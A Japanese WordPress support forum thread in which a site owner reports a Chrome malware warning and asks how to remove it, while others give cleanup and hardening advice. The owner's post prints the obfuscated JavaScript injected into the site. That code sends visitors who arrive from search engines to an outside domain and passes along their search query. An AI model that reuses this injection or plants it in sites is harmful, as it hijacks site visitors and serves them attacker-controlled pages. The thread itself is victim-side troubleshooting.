• 解決済 to_fu

    (@to_fu)


    自サイトをchromeで閲覧したら、掲題の警告がでてきました。
    ウェブマスターツールで確認したところマルウェアに感染しており、
    下記コードが不正に埋め込まれたとのこと。

    <script language="JavaScript">eval(function(p,a,c,k,e,r){e=f
    unction(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?Strin
    g.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,Str
    ing)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e
    ]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.re
    place(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('e r=
    x.9,t="",q;4(r.3("m.")!=-1)t="q";4(r.3("7.")!=-1)t="q";4(r.3
    ("8.")!=-1)t="p";4(r.3("a.")!=-1)t="q";4(r.3("f.")!=-1)t="g"
    ;4(r.3("j.")!=-1)t="q";4(t.6&&((q=r.3("?"+t+"="))!=-1||(q=r.
    3("&"+t+"="))!=-1))B.C="v"+"w"+":/"+"/A"+"b"+"k"+"5"+"h."+"c
    "+"z/s"+"u"+"5"+"h.p"+"d?"+"t"+"y=1&t"+"i"+"l="+r.n(q+2+t.6)
    .o("&")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referr
    er|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|s
    ubstring|split||||||ea|ht|tp|document|||go|window|location'.
    split('|'),0,{}))</script>

    ただ、テーマのindex.phpやheader.phpを見てもコードは見当たらず、
    どのファイルのどこを削除すれば良いのかわかりません。
    対処法を教えてください。

4件の返信を表示中 - 1 - 4件目 (全4件中)
  • こんにちは

    まずは、以下のリンクを

    http://wpdocs.sourceforge.jp/FAQ/%E3%83%8F%E3%83%83%E3%82%AD%E3%83%B3%E3%82%B0%E3%83%BB%E3%82%AF%E3%83%A9%E3%83%83%E3%82%AD%E3%83%B3%E3%82%B0%E8%A2%AB%E5%AE%B3

    また、改ざんを検知できるプラグインもありますので、そういうものを使ってみるのも改ざん部分の特定に役立つかもしれません。
    WordPress Exploit Scanner
    http://ja.forums.wordpress.org/topic/2743?replies=17

    改ざん等で、最も被害を受けるのは、そのサイトを訪問した閲覧者です。
    サイトの公開を停止して、サーバー会社にも連絡してください

    トピック投稿者 to_fu

    (@to_fu)

    nobitaさん、ありがとうございます。
    サーバーのデータをgetして、grepをかけてもコードが見当たらなかったので、
    wpをアンインストール、データは全削除したうえで、ローカルのデータをアップいたしました。

    今朝方確認したところ、Googleの再審査の結果、警告は解除されていました。

    再度、wpをインストールするのが少し怖いです。
    なぜマルウェアに感染してしまったのか、原因が知りたいです。
    マルチサイト機能を設定していたのですが、セキュリティ上関係はあるのでしょうか?
    (別スレッドで質問させていただいた方が良いですかね。。。)

    こんにちは

    WordPressのコアファイルについては、マルウェアが混入している事はまずないと思いますが、プラグインやテーマファイルは、ワードプレスのコミュニティーが開発しているわけではないので、動かないものから、怪しいものまで、ネット上にはあふれています。

    プラグインを選ぶ時には、たくさんダウンロードされていて、星がいっぱいついている公式プラグインから選んだり、
    とてもかっこよいテーマでも、公式テーマから選らんで、多少のカスタマイズは自分で行う

    というような、欲望に打ち勝つ根性を養いましょう。

    しばらくは、持てる技術の総力をもって監視しましょう。

    SSHで接続できれば、変更のあったファイル一覧を表示して、改ざん監視をするとか、

    WordPressから外部にアクセスするのをしばらく禁止するとか

    define('WP_HTTP_BLOCK_EXTERNAL', true);
    define('WP_ACCESSIBLE_HOSTS','ja.wordpress.org, api.wordpress.org, wordpress.org,planet.wordpress.org','downloads.wordpress.org/');

    今まで、プラグインやテーマの編集をしていたなら、やめて、パーミッションを厳しくしたり、
    パーマリンクを変えると、自動的に.htaccessを書き換えてくれていたものをパーミッションを厳しくして、自分でコピペするとか、

    万全を期し、クラッカーが再度やってくるのを楽しみに待ちましょう。

    痕跡を見つけ、やっつけたら勉強になるし、自信もつきます。

    と、私がやっつけられた時には、そう思って、対策してました 🙂

    精神論だけで申し訳ないですが、WordPressそんなに ヘボくないですよ

    トピック投稿者 to_fu

    (@to_fu)

    nobitaさん、ありがとうございます。

    いろいろ調べていくと、xamppで作成したオリジナルテーマがすべて感染していることがわかりました。
    ローカルに問題があるということでしょうか。

    新しくスレッドを立てましたので、見ていただけるとうれしいです。
    「xamppでマルウェアに感染?」

4件の返信を表示中 - 1 - 4件目 (全4件中)
  • トピック「警告: 不正なソフトウェアが存在する可能性があります」には新たに返信することはできません。